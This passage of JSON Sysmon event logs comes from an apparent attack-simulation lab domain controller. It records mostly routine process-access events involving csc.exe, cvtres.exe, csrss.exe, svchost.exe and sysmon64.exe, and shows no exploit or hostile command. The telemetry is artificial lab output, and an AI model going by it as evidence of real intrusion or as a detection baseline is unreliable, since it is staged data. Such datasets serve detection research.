\"c:\\Users\\Administrator\\AppData\\Local\\Temp\\otdkyjr3\\CSC425C408B2BF74100922E7DB5DC4E944E.TMP\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-0312-5F25-0000-0020C4B40600}","LogonId":"0x6b4c4","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF","ParentProcessGuid":"{A837DB8D-0315-5F25-0000-001077050700}","ParentProcessId":"3652","ParentImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","ParentCommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\otdkyjr3\\otdkyjr3.cmdline\"","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4644,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.420\r\nSourceProcessGUID: {A837DB8D-0315-5F25-0000-001077050700}\r\nSourceProcessId: 3652\r\nSourceThreadId: 3660\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetProcessGUID: {A837DB8D-0315-5F25-0000-001005090700}\r\nTargetProcessId: 3320\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:21.420","SourceProcessGUID":"{A837DB8D-0315-5F25-0000-001077050700}","SourceProcessId":"3652","SourceThreadId":"3660","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetProcessGUID":"{A837DB8D-0315-5F25-0000-001005090700}","TargetProcessId":"3320","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4645,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.420\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0315-5F25-0000-001005090700}\r\nTargetProcessId: 3320\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:21.420","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0315-5F25-0000-001005090700}","TargetProcessId":"3320","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4646,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.420\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:21.420","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4647,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.420\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:21.420","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4648,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.420\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:21.420","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4649,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.420\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:21.420","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4650,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.420\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:21.420","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4651,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.420\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 